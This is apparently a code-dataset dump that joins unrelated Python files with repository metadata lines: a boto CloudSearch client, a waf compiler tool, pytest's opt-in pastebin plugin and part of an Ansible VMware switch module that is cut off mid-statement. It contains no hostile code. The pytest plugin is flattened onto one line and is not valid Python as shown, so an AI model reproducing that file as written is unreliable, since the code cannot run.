# IN THE SOFTWARE.
#
import boto.exception
from boto.compat import json
import requests
import boto

from boto.cloudsearchdomain.layer1 import CloudSearchDomainConnection


class SearchServiceException(Exception):
    pass


class CommitMismatchError(Exception):
    # Let's do some extra work and let the user handle errors on his/her own.
    errors = None


class EncodingError(Exception):
    """
    Content sent for Cloud Search indexing was incorrectly encoded.

    This usually happens when a document is marked as unicode but non-unicode
    characters are present.
    """
    pass


class ContentTooLongError(Exception):
    """
    Content sent for Cloud Search indexing was too long

    This will usually happen when documents queued for indexing add up to more
    than the limit allowed per upload batch (5MB)
    """
    pass


class DocumentServiceConnection(object):
    """
    A CloudSearch document service.

    The DocumentServiceConection is used to add, remove and update documents in
    CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document
    Format).

    To generate an appropriate SDF, use :func:`add` to add or update documents,
    as well as :func:`delete` to remove documents.

    Once the set of documents is ready to be index, use :func:`commit` to send
    the commands to CloudSearch.

    If there are a lot of documents to index, it may be preferable to split the
    generation of SDF data and the actual uploading into CloudSearch. Retrieve
    the current SDF with :func:`get_sdf`. If this file is the uploaded into S3,
    it can be retrieved back afterwards for upload into CloudSearch using
    :func:`add_sdf_from_s3`.

    The SDF is not cleared after a :func:`commit`. If you wish to continue
    using the DocumentServiceConnection for another batch upload of commands,
    you will need to :func:`clear_sdf` first to stop the previous batch of
    commands from being uploaded again.

    """

    def __init__(self, domain=None, endpoint=None):
        self.domain = domain
        self.endpoint = endpoint
        if not self.endpoint:
            self.endpoint = domain.doc_service_endpoint
        self.documents_batch = []
        self._sdf = None

        # Copy proxy settings from connection and check if request should
        # be signed
        self.proxy = {}
        self.sign_request = False
        if self.domain and self.domain.layer1:
            if self.domain.layer1.use_proxy:
                self.proxy = {'http': self.domain.layer1.get_proxy_url_with_auth()}

            self.sign_request = getattr(self.domain.layer1, 'sign_request', False)

            if self.sign_request:
                # Create a domain connection to send signed requests
                layer1 = self.domain.layer1
                self.domain_connection = CloudSearchDomainConnection(
                    host=self.endpoint,
                    aws_access_key_id=layer1.aws_access_key_id,
                    aws_secret_access_key=layer1.aws_secret_access_key,
                    region=layer1.region,
                    provider=layer1.provider
                )

    def add(self, _id, fields):
        """
        Add a document to be processed by the DocumentService

        The document will not actually be added until :func:`commit` is called

        :type _id: string
        :param _id: A unique ID used to refer to this document.

        :type fields: dict
        :param fields: A dictionary of key-value pairs to be uploaded .
        """
        d = {'type': 'add', 'id': _id, 'fields': fields}
        self.documents_batch.append(d)

    def delete(self, _id):
        """
        Schedule a document to be removed from the CloudSearch service

        The document will not actually be scheduled for removal until
        :func:`commit` is called

        :type _id: string
        :param _id: The unique ID of this document.
        """
        d = {'type': 'delete', 'id': _id}
        self.documents_batch.append(d)

    def get_sdf(self):
        """
        Generate the working set of documents in Search Data Format (SDF)

        :rtype: string
        :returns: JSON-formatted string of the documents in SDF
        """
        return self._sdf if self._sdf else json.dumps(self.documents_batch)

    def clear_sdf(self):
        """
        Clear the working documents from this DocumentServiceConnection

        This should be used after :func:`commit` if the connection will be
        reused for another set of documents.

        """
        self._sdf = None
        self.documents_batch = []

    def add_sdf_from_s3(self, key_obj):
        """
        Load an SDF from S3

        Using this method will result in documents added through
        :func:`add` and :func:`delete` being ignored.

        :type key_obj: :class:`boto.s3.key.Key`
        :param key_obj: An S3 key which contains an SDF
        """
        #@todo:: (lucas) would be nice if this could just take an s3://uri..."
        self._sdf = key_obj.get_contents_as_string()

    def _commit_with_auth(self, sdf, api_version):
        # Signed upload through the CloudSearchDomainConnection built in
        # __init__ (only present when sign_request is True).
        return self.domain_connection.upload_documents(sdf, 'application/json')

    def _commit_without_auth(self, sdf, api_version):
        url = "http://%s/%s/documents/batch" % (self.endpoint, api_version)

        # Keep-alive is automatic in a post-1.0 requests world.
        session = requests.Session()
        session.proxies = self.proxy
        adapter = requests.adapters.HTTPAdapter(
            pool_connections=20,
            pool_maxsize=50,
            max_retries=5
        )
        session.mount('http://', adapter)
        session.mount('https://', adapter)

        resp = session.post(url, data=sdf, headers={'Content-Type': 'application/json'})
        return resp

    def commit(self):
        """
        Actually send an SDF to CloudSearch for processing

        If an SDF file has been explicitly loaded it will be used. Otherwise,
        documents added through :func:`add` and :func:`delete` will be used.

        :rtype: :class:`CommitResponse`
        :returns: A summary of documents added and deleted
        """
        sdf = self.get_sdf()

        if ': null' in sdf:
            boto.log.error('null value in sdf detected. This will probably '
                           'raise 500 error.')
            index = sdf.index(': null')
            boto.log.error(sdf[index - 100:index + 100])

        api_version = '2013-01-01'
        if self.domain and self.domain.layer1:
            api_version = self.domain.layer1.APIVersion

        if self.sign_request:
            r = self._commit_with_auth(sdf, api_version)
        else:
            r = self._commit_without_auth(sdf, api_version)

        return CommitResponse(r, self, sdf, signed_request=self.sign_request)


class CommitResponse(object):
    """Wrapper for response to Cloudsearch document batch commit.

    :type response: :class:`requests.models.Response`
    :param response: Response from Cloudsearch /documents/batch API

    :type doc_service: :class:`boto.cloudsearch2.document.DocumentServiceConnection`
    :param doc_service: Object containing the documents posted and methods to
        retry

    :raises: :class:`boto.exception.BotoServerError`
    :raises: :class:`boto.cloudsearch2.document.SearchServiceException`
    :raises: :class:`boto.cloudsearch2.document.EncodingError`
    :raises: :class:`boto.cloudsearch2.document.ContentTooLongError`
    """
    def __init__(self, response, doc_service, sdf, signed_request=False):
        self.response = response
        self.doc_service = doc_service
        self.sdf = sdf
        self.signed_request = signed_request

        if self.signed_request:
            self.content = response
        else:
            _body = response.content.decode('utf-8')

            try:
                self.content = json.loads(_body)
            # BUGFIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt/SystemExit. json.loads signals a malformed
            # body with ValueError (JSONDecodeError is a subclass), so only
            # that is translated into a BotoServerError.
            except ValueError:
                boto.log.error('Error indexing documents.\nResponse Content:\n{0}'
                               '\n\nSDF:\n{1}'.format(_body, self.sdf))
                raise boto.exception.BotoServerError(self.response.status_code,
                                                     '', body=_body)

        self.status = self.content['status']
        if self.status == 'error':
            self.errors = [e.get('message') for e in self.content.get('errors',
                                                                      [])]
            for e in self.errors:
                if "Illegal Unicode character" in e:
                    raise EncodingError("Illegal Unicode character in document")
                elif e == "The Content-Length is too long":
                    raise ContentTooLongError("Content was too long")
        else:
            self.errors = []

        self.adds = self.content['adds']
        self.deletes = self.content['deletes']
        self._check_num_ops('add', self.adds)
        self._check_num_ops('delete', self.deletes)

    def _check_num_ops(self, type_, response_num):
        """Raise exception if number of ops in response doesn't match commit

        :type type_: str
        :param type_: Type of commit operation: 'add' or 'delete'

        :type response_num: int
        :param response_num: Number of adds or deletes in the response.

        :raises: :class:`boto.cloudsearch2.document.CommitMismatchError`
        """
        commit_num = len([d for d in self.doc_service.documents_batch
                          if d['type'] == type_])

        if response_num != commit_num:
            if self.signed_request:
                boto.log.debug(self.response)
            else:
                boto.log.debug(self.response.content)
            # There will always be a commit mismatch error if there is any
            # errors on cloudsearch. self.errors gets lost when this
            # CommitMismatchError is raised. Whoever is using boto has no idea
            # why their commit failed. They can't even notify the user of the
            # cause by parsing the error messages from amazon. So let's
            # attach the self.errors to the exceptions if we already spent
            # time and effort collecting them out of the response.
            exc = CommitMismatchError(
                'Incorrect number of {0}s returned. Commit: {1} Response: {2}'
                .format(type_, commit_num, response_num)
            )
            exc.errors = self.errors
            raise exc
apache-2.0
AndrewSmart/audacity
lib-src/lv2/lv2/plugins/eg02-midigate.lv2/waflib/Tools/suncc.py
134
1378
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file

import os
from waflib import Utils
from waflib.Tools import ccroot, ar
from waflib.Configure import conf


@conf
def find_scc(conf):
    """Locate the Sun C compiler, verify it, and record it in ``conf.env``."""
    env = conf.env
    compiler = None
    if env['CC']:
        compiler = env['CC']
    elif 'CC' in conf.environ:
        compiler = conf.environ['CC']
    if not compiler:
        compiler = conf.find_program('cc', var='CC')
    if not compiler:
        conf.fatal('Could not find a Sun C compiler')
    compiler = conf.cmd_to_list(compiler)
    # "cc -flags" only succeeds for the Sun compiler; use it as a probe.
    try:
        conf.cmd_and_log(compiler + ['-flags'])
    except Exception:
        conf.fatal('%r is not a Sun compiler' % compiler)
    env['CC'] = compiler
    env['CC_NAME'] = 'sun'


@conf
def scc_common_flags(conf):
    """Fill ``conf.env`` with the flag patterns used by the Sun C compiler."""
    env = conf.env

    # Compilation command layout.
    env['CC_SRC_F'] = []
    env['CC_TGT_F'] = ['-c', '-o']

    # Link with the compiler driver when no dedicated linker is configured.
    if not env['LINK_CC']:
        env['LINK_CC'] = env['CC']
    env['CCLNK_SRC_F'] = ''
    env['CCLNK_TGT_F'] = ['-o']

    # Preprocessor / library search patterns.
    env['CPPPATH_ST'] = '-I%s'
    env['DEFINES_ST'] = '-D%s'
    env['LIB_ST'] = '-l%s'
    env['LIBPATH_ST'] = '-L%s'
    env['STLIB_ST'] = '-l%s'
    env['STLIBPATH_ST'] = '-L%s'
    env['SONAME_ST'] = '-Wl,-h,%s'
    env['SHLIB_MARKER'] = '-Bdynamic'
    env['STLIB_MARKER'] = '-Bstatic'

    # Output file name patterns and per-target-kind flags.
    env['cprogram_PATTERN'] = '%s'
    env['CFLAGS_cshlib'] = ['-Kpic', '-DPIC']
    env['LINKFLAGS_cshlib'] = ['-G']
    env['cshlib_PATTERN'] = 'lib%s.so'
    env['LINKFLAGS_cstlib'] = ['-Bstatic']
    env['cstlib_PATTERN'] = 'lib%s.a'


def configure(conf):
    """Waf entry point: detect and set up the Sun C compiler tool chain."""
    conf.find_scc()
    conf.find_ar()
    conf.scc_common_flags()
    conf.cc_load_tools()
    conf.cc_add_flags()
    conf.link_add_flags()
gpl-2.0
DDEFISHER/servo
tests/wpt/web-platform-tests/tools/pytest/_pytest/pastebin.py
181
3483
""" submit failure or test session information to a pastebin service. """ import pytest import sys import tempfile def pytest_addoption(parser): group = parser.getgroup("terminal reporting") group._addoption('--pastebin', metavar="mode", action='store', dest="pastebin", default=None, choices=['failed', 'all'], help="send failed|all info to bpaste.net pastebin service.") @pytest.hookimpl(trylast=True) def pytest_configure(config): import py if config.option.pastebin == "all": tr = config.pluginmanager.getplugin('terminalreporter') # if no terminal reporter plugin is present, nothing we can do here; # this can happen when this function executes in a slave node # when using pytest-xdist, for example if tr is not None: # pastebin file will be utf-8 encoded binary file config._pastebinfile = tempfile.TemporaryFile('w+b') oldwrite = tr._tw.write def tee_write(s, **kwargs): oldwrite(s, **kwargs) if py.builtin._istext(s): s = s.encode('utf-8') config._pastebinfile.write(s) tr._tw.write = tee_write def pytest_unconfigure(config): if hasattr(config, '_pastebinfile'): # get terminal contents and delete file config._pastebinfile.seek(0) sessionlog = config._pastebinfile.read() config._pastebinfile.close() del config._pastebinfile # undo our patching in the terminal reporter tr = config.pluginmanager.getplugin('terminalreporter') del tr._tw.__dict__['write'] # write summary tr.write_sep("=", "Sending information to Paste Service") pastebinurl = create_new_paste(sessionlog) tr.write_line("pastebin session-log: %s\n" % pastebinurl) def create_new_paste(contents): """ Creates a new paste using bpaste.net service. 
:contents: paste contents as utf-8 encoded bytes :returns: url to the pasted contents """ import re if sys.version_info < (3, 0): from urllib import urlopen, urlencode else: from urllib.request import urlopen from urllib.parse import urlencode params = { 'code': contents, 'lexer': 'python3' if sys.version_info[0] == 3 else 'python', 'expiry': '1week', } url = 'https://bpaste.net' response = urlopen(url, data=urlencode(params).encode('ascii')).read() m = re.search(r'href="/raw/(\w+)"', response.decode('utf-8')) if m: return '%s/show/%s' % (url, m.group(1)) else: return 'bad response: ' + response def pytest_terminal_summary(terminalreporter): import _pytest.config if terminalreporter.config.option.pastebin != "failed": return tr = terminalreporter if 'failed' in tr.stats: terminalreporter.write_sep("=", "Sending information to Paste Service") for rep in terminalreporter.stats.get('failed'): try: msg = rep.longrepr.reprtraceback.reprentries[-1].reprfileloc except AttributeError: msg = tr._getfailureheadline(rep) tw = _pytest.config.create_terminal_writer(terminalreporter.config, stringio=True) rep.toterminal(tw) s = tw.stringio.getvalue() assert len(s) pastebinurl = create_new_paste(s) tr.write_line("%s --> %s" %(msg, pastebinurl))
mpl-2.0
kvar/ansible
lib/ansible/modules/cloud/vmware/vmware_dvswitch.py
23
33516
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright: (c) 2015, Joseph Callen <jcallen () csc.com> # Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com> # Copyright: (c) 2018, Christian Kotte <christian.kotte@gmx.de> # Copyright: (c) 2018, Ansible Project # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: vmware_dvswitch short_description: Create or remove a Distributed Switch description: - This module can be used to create, remove a Distributed Switch. version_added: 2.0 author: - Joseph Callen (@jcpowermac) - Abhijeet Kasurde (@Akasurde) - Christian Kotte (@ckotte) notes: - Tested on vSphere 6.5 and 6.7 requirements: - "python >= 2.6" - PyVmomi options: datacenter_name: description: - The name of the datacenter that will contain the Distributed Switch. - This parameter is optional, if C(folder) is provided. - Mutually exclusive with C(folder) parameter. required: False aliases: ['datacenter'] type: str switch_name: description: - The name of the distribute vSwitch to create or remove. required: True aliases: ['switch', 'dvswitch'] type: str switch_version: description: - The version of the Distributed Switch to create. - Can be 6.0.0, 5.5.0, 5.1.0, 5.0.0 with a vCenter running vSphere 6.0 and 6.5. - Can be 6.6.0, 6.5.0, 6.0.0 with a vCenter running vSphere 6.7. - The version must match the version of the ESXi hosts you want to connect. - The version of the vCenter server is used if not specified. - Required only if C(state) is set to C(present). version_added: 2.5 choices: ['5.0.0', '5.1.0', '5.5.0', '6.0.0', '6.5.0', '6.6.0'] aliases: ['version'] type: str mtu: description: - The switch maximum transmission unit. 
- Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. - Accepts value between 1280 to 9000 (both inclusive). type: int default: 1500 multicast_filtering_mode: description: - The multicast filtering mode. - 'C(basic) mode: multicast traffic for virtual machines is forwarded according to the destination MAC address of the multicast group.' - 'C(snooping) mode: the Distributed Switch provides IGMP and MLD snooping according to RFC 4541.' type: str choices: ['basic', 'snooping'] default: 'basic' version_added: 2.8 uplink_quantity: description: - Quantity of uplink per ESXi host added to the Distributed Switch. - The uplink quantity can be increased or decreased, but a decrease will only be successfull if the uplink isn't used by a portgroup. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. type: int uplink_prefix: description: - The prefix used for the naming of the uplinks. - Only valid if the Distributed Switch will be created. Not used if the Distributed Switch is already present. - Uplinks are created as Uplink 1, Uplink 2, etc. pp. by default. default: 'Uplink ' version_added: 2.8 type: str discovery_proto: description: - Link discovery protocol between Cisco and Link Layer discovery. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. - 'C(cdp): Use Cisco Discovery Protocol (CDP).' - 'C(lldp): Use Link Layer Discovery Protocol (LLDP).' - 'C(disabled): Do not use a discovery protocol.' choices: ['cdp', 'lldp', 'disabled'] default: 'cdp' aliases: [ 'discovery_protocol' ] type: str discovery_operation: description: - Select the discovery operation. 
- Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. choices: ['both', 'advertise', 'listen'] default: 'listen' type: str contact: description: - Dictionary which configures administrator contact name and description for the Distributed Switch. - 'Valid attributes are:' - '- C(name) (str): Administrator name.' - '- C(description) (str): Description or other details.' type: dict version_added: 2.8 description: description: - Description of the Distributed Switch. type: str version_added: 2.8 health_check: description: - Dictionary which configures Health Check for the Distributed Switch. - 'Valid attributes are:' - '- C(vlan_mtu) (bool): VLAN and MTU health check. (default: False)' - '- C(teaming_failover) (bool): Teaming and failover health check. (default: False)' - '- C(vlan_mtu_interval) (int): VLAN and MTU health check interval (minutes). (default: 0)' - '- The default for C(vlan_mtu_interval) is 1 in the vSphere Client if the VLAN and MTU health check is enabled.' - '- C(teaming_failover_interval) (int): Teaming and failover health check interval (minutes). (default: 0)' - '- The default for C(teaming_failover_interval) is 1 in the vSphere Client if the Teaming and failover health check is enabled.' type: dict default: { vlan_mtu: False, teaming_failover: False, vlan_mtu_interval: 0, teaming_failover_interval: 0, } version_added: 2.8 state: description: - If set to C(present) and the Distributed Switch doesn't exists then the Distributed Switch will be created. - If set to C(absent) and the Distributed Switch exists then the Distributed Switch will be deleted. default: 'present' choices: ['present', 'absent'] type: str folder: description: - Destination folder, absolute path to place dvswitch in. - The folder should include the datacenter. - This parameter is case sensitive. - This parameter is optional, if C(datacenter) is provided. 
- 'Examples:' - ' folder: /datacenter1/network' - ' folder: datacenter1/network' - ' folder: /datacenter1/network/folder1' - ' folder: datacenter1/network/folder1' - ' folder: /folder1/datacenter1/network' - ' folder: folder1/datacenter1/network' - ' folder: /folder1/datacenter1/network/folder2' required: False type: str version_added: 2.9 extends_documentation_fragment: vmware.documentation ''' EXAMPLES = ''' - name: Create dvSwitch vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch version: 6.0.0 mtu: 9000 uplink_quantity: 2 discovery_protocol: lldp discovery_operation: both state: present delegate_to: localhost - name: Create dvSwitch with all options vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch version: 6.5.0 mtu: 9000 uplink_quantity: 2 uplink_prefix: 'Uplink_' discovery_protocol: cdp discovery_operation: both multicast_filtering_mode: snooping health_check: vlan_mtu: true vlan_mtu_interval: 1 teaming_failover: true teaming_failover_interval: 1 state: present delegate_to: localhost - name: Delete dvSwitch vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch state: absent delegate_to: localhost ''' RETURN = """ result: description: information about performed operation returned: always type: str sample: { "changed": false, "contact": null, "contact_details": null, "description": null, "discovery_operation": "both", "discovery_protocol": "cdp", "dvswitch": "test", "health_check_teaming": false, "health_check_teaming_interval": 0, "health_check_vlan": false, "health_check_vlan_interval": 0, "mtu": 9000, "multicast_filtering_mode": "basic", "result": "DVS already configured properly", "uplink_quantity": 2, 
"uplinks": [ "Uplink_1", "Uplink_2" ], "version": "6.6.0" } """ try: from pyVmomi import vim, vmodl except ImportError: pass from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native from ansible.module_utils.vmware import ( PyVmomi, TaskError, find_dvs_by_name, vmware_argument_spec, wait_for_task ) class VMwareDvSwitch(PyVmomi): """Class to manage a Distributed Virtual Switch""" def __init__(self, module): super(VMwareDvSwitch, self).__init__(module) self.dvs = None self.switch_name = self.module.params['switch_name'] self.switch_version = self.module.params['switch_version'] if self.content.about.version == '6.7.0': self.vcenter_switch_version = '6.6.0' else: self.vcenter_switch_version = self.content.about.version folder = self.params['folder'] if folder: self.folder_obj = self.content.searchIndex.FindByInventoryPath(folder) if not self.folder_obj: self.module.fail_json(msg="Failed to find the folder specified by %(folder)s" % self.params) else: datacenter_name = self.params.get('datacenter_name') datacenter_obj = self.find_datacenter_by_name(datacenter_name) if not datacenter_obj: self.module.fail_json(msg="Failed to find datacenter '%s' required" " for managing distributed vSwitch." % datacenter_name) self.folder_obj = datacenter_obj.networkFolder self.mtu = self.module.params['mtu'] # MTU sanity check if not 1280 <= self.mtu <= 9000: self.module.fail_json( msg="MTU value should be between 1280 and 9000 (both inclusive), provided %d." 
% self.mtu ) self.multicast_filtering_mode = self.module.params['multicast_filtering_mode'] self.uplink_quantity = self.module.params['uplink_quantity'] self.uplink_prefix = self.module.params['uplink_prefix'] self.discovery_protocol = self.module.params['discovery_proto'] self.discovery_operation = self.module.params['discovery_operation'] # TODO: add port mirroring self.health_check_vlan = self.params['health_check'].get('vlan_mtu') self.health_check_vlan_interval = self.params['health_check'].get('vlan_mtu_interval') self.health_check_teaming = self.params['health_check'].get('teaming_failover') self.health_check_teaming_interval = self.params['health_check'].get('teaming_failover_interval') if self.params['contact']: self.contact_name = self.params['contact'].get('name') self.contact_details = self.params['contact'].get('details') else: self.contact_name = None self.contact_details = None self.description = self.module.params['description'] self.state = self.module.params['state'] def process_state(self): """Process the current state of the DVS""" dvs_states = { 'absent': { 'present': self.destroy_dvswitch, 'absent': self.exit_unchanged, }, 'present': { 'present': self.update_dvswitch, 'absent': self.create_dvswitch, } } try: dvs_states[self.state][self.check_dvs()]() except vmodl.RuntimeFault as runtime_fault: self.module.fail_json(msg=to_native(runtime_fault.msg)) except vmodl.MethodFault as method_fault: self.module.fail_json(msg=to_native(method_fault.msg)) except Exception as e: self.module.fail_json(msg=to_native(e)) def check_dvs(self): """Check if DVS is present""" self.dvs = find_dvs_by_name(self.content, self.switch_name, folder=self.folder_obj) if self.dvs is None: return 'absent' return 'present' def create_dvswitch(self): """Create a DVS""" changed = True results = dict(changed=changed) spec = vim.DistributedVirtualSwitch.CreateSpec() spec.configSpec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Name results['dvswitch'] = self.switch_name 
spec.configSpec.name = self.switch_name # MTU results['mtu'] = self.mtu spec.configSpec.maxMtu = self.mtu # Discovery Protocol type and operation results['discovery_protocol'] = self.discovery_protocol results['discovery_operation'] = self.discovery_operation spec.configSpec.linkDiscoveryProtocolConfig = self.create_ldp_spec() # Administrator contact results['contact'] = self.contact_name results['contact_details'] = self.contact_details if self.contact_name or self.contact_details: spec.contact = self.create_contact_spec() # Description results['description'] = self.description if self.description: spec.description = self.description # Uplinks results['uplink_quantity'] = self.uplink_quantity spec.configSpec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy() for count in range(1, self.uplink_quantity + 1): spec.configSpec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) results['uplinks'] = spec.configSpec.uplinkPortPolicy.uplinkPortName # Version results['version'] = self.switch_version if self.switch_version: spec.productInfo = self.create_product_spec(self.switch_version) if self.module.check_mode: result = "DVS would be created" else: # Create DVS network_folder = self.folder_obj task = network_folder.CreateDVS_Task(spec) try: wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json( msg="Failed to create DVS : %s" % to_native(invalid_argument) ) # Find new DVS self.dvs = find_dvs_by_name(self.content, self.switch_name) changed_multicast = False spec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Use the same version in the new spec; The version will be increased by one by the API automatically spec.configVersion = self.dvs.config.configVersion # Set multicast filtering mode results['multicast_filtering_mode'] = self.multicast_filtering_mode multicast_filtering_mode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if self.dvs.config.multicastFilteringMode != 
multicast_filtering_mode: changed_multicast = True spec.multicastFilteringMode = multicast_filtering_mode spec.multicastFilteringMode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if changed_multicast: self.update_dvs_config(self.dvs, spec) # Set Health Check config results['health_check_vlan'] = self.health_check_vlan results['health_check_teaming'] = self.health_check_teaming result = self.check_health_check_config(self.dvs.config.healthCheckConfig) changed_health_check = result[1] if changed_health_check: self.update_health_check_config(self.dvs, result[0]) result = "DVS created" self.module.exit_json(changed=changed, result=to_native(result)) def create_ldp_spec(self): """Create Link Discovery Protocol config spec""" ldp_config_spec = vim.host.LinkDiscoveryProtocolConfig() if self.discovery_protocol == 'disabled': ldp_config_spec.protocol = 'cdp' ldp_config_spec.operation = 'none' else: ldp_config_spec.protocol = self.discovery_protocol ldp_config_spec.operation = self.discovery_operation return ldp_config_spec def create_product_spec(self, switch_version): """Create product info spec""" product_info_spec = vim.dvs.ProductSpec() product_info_spec.version = switch_version return product_info_spec @staticmethod def get_api_mc_filtering_mode(mode): """Get Multicast filtering mode""" if mode == 'basic': return 'legacyFiltering' return 'snooping' def create_contact_spec(self): """Create contact info spec""" contact_info_spec = vim.DistributedVirtualSwitch.ContactInfo() contact_info_spec.name = self.contact_name contact_info_spec.contact = self.contact_details return contact_info_spec def update_dvs_config(self, switch_object, spec): """Update DVS config""" try: task = switch_object.ReconfigureDvs_Task(spec) wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json( msg="Failed to update DVS : %s" % to_native(invalid_argument) ) def check_health_check_config(self, health_check_config): """Check Health Check config""" changed = 
changed_vlan = changed_vlan_interval = changed_teaming = changed_teaming_interval = False vlan_previous = teaming_previous = None vlan_interval_previous = teaming_interval_previous = 0 for config in health_check_config: if isinstance(config, vim.dvs.VmwareDistributedVirtualSwitch.VlanMtuHealthCheckConfig): if config.enable != self.health_check_vlan: changed = changed_vlan = True vlan_previous = config.enable config.enable = self.health_check_vlan if config.enable and config.interval != self.health_check_vlan_interval: changed = changed_vlan_interval = True vlan_interval_previous = config.interval config.interval = self.health_check_vlan_interval if isinstance(config, vim.dvs.VmwareDistributedVirtualSwitch.TeamingHealthCheckConfig): if config.enable != self.health_check_teaming: changed = changed_teaming = True teaming_previous = config.enable config.enable = self.health_check_teaming if config.enable and config.interval != self.health_check_teaming_interval: changed = changed_teaming_interval = True teaming_interval_previous = config.interval config.interval = self.health_check_teaming_interval return (health_check_config, changed, changed_vlan, vlan_previous, changed_vlan_interval, vlan_interval_previous, changed_teaming, teaming_previous, changed_teaming_interval, teaming_interval_previous) def update_health_check_config(self, switch_object, health_check_config): """Update Health Check config""" try: task = switch_object.UpdateDVSHealthCheckConfig_Task(healthCheckConfig=health_check_config) except vim.fault.DvsFault as dvs_fault: self.module.fail_json(msg="Update failed due to DVS fault : %s" % to_native(dvs_fault)) except vmodl.fault.NotSupported as not_supported: self.module.fail_json(msg="Health check not supported on the switch : %s" % to_native(not_supported)) except TaskError as invalid_argument: self.module.fail_json(msg="Failed to configure health check : %s" % to_native(invalid_argument)) try: wait_for_task(task) except TaskError as invalid_argument: 
self.module.fail_json(msg="Failed to update health check config : %s" % to_native(invalid_argument)) def exit_unchanged(self): """Exit with status message""" changed = False results = dict(changed=changed) results['dvswitch'] = self.switch_name results['result'] = "DVS not present" self.module.exit_json(**results) def destroy_dvswitch(self): """Delete a DVS""" changed = True results = dict(changed=changed) results['dvswitch'] = self.switch_name if self.module.check_mode: results['result'] = "DVS would be deleted" else: try: task = self.dvs.Destroy_Task() except vim.fault.VimFault as vim_fault: self.module.fail_json(msg="Failed to deleted DVS : %s" % to_native(vim_fault)) wait_for_task(task) results['result'] = "DVS deleted" self.module.exit_json(**results) def update_dvswitch(self): """Check and update DVS settings""" changed = changed_settings = changed_ldp = changed_version = changed_health_check = False results = dict(changed=changed) results['dvswitch'] = self.switch_name changed_list = [] config_spec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Use the same version in the new spec; The version will be increased by one by the API automatically config_spec.configVersion = self.dvs.config.configVersion # Check MTU results['mtu'] = self.mtu if self.dvs.config.maxMtu != self.mtu: changed = changed_settings = True changed_list.append("mtu") results['mtu_previous'] = config_spec.maxMtu config_spec.maxMtu = self.mtu # Check Discovery Protocol type and operation ldp_protocol = self.dvs.config.linkDiscoveryProtocolConfig.protocol ldp_operation = self.dvs.config.linkDiscoveryProtocolConfig.operation if self.discovery_protocol == 'disabled': results['discovery_protocol'] = self.discovery_protocol results['discovery_operation'] = 'n/a' if ldp_protocol != 'cdp' or ldp_operation != 'none': changed_ldp = True results['discovery_protocol_previous'] = ldp_protocol results['discovery_operation_previous'] = ldp_operation else: results['discovery_protocol'] = 
self.discovery_protocol results['discovery_operation'] = self.discovery_operation if ldp_protocol != self.discovery_protocol or ldp_operation != self.discovery_operation: changed_ldp = True if ldp_protocol != self.discovery_protocol: results['discovery_protocol_previous'] = ldp_protocol if ldp_operation != self.discovery_operation: results['discovery_operation_previous'] = ldp_operation if changed_ldp: changed = changed_settings = True changed_list.append("discovery protocol") config_spec.linkDiscoveryProtocolConfig = self.create_ldp_spec() # Check Multicast filtering mode results['multicast_filtering_mode'] = self.multicast_filtering_mode multicast_filtering_mode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if self.dvs.config.multicastFilteringMode != multicast_filtering_mode: changed = changed_settings = True changed_list.append("multicast filtering") results['multicast_filtering_mode_previous'] = self.dvs.config.multicastFilteringMode config_spec.multicastFilteringMode = multicast_filtering_mode # Check administrator contact results['contact'] = self.contact_name results['contact_details'] = self.contact_details if self.dvs.config.contact.name != self.contact_name or self.dvs.config.contact.contact != self.contact_details: changed = changed_settings = True changed_list.append("contact") results['contact_previous'] = self.dvs.config.contact.name results['contact_details_previous'] = self.dvs.config.contact.contact config_spec.contact = self.create_contact_spec() # Check description results['description'] = self.description if self.dvs.config.description != self.description: changed = changed_settings = True changed_list.append("description") results['description_previous'] = self.dvs.config.description if self.description is None: # need to use empty string; will be set to None by API config_spec.description = '' else: config_spec.description = self.description # Check uplinks results['uplink_quantity'] = self.uplink_quantity if 
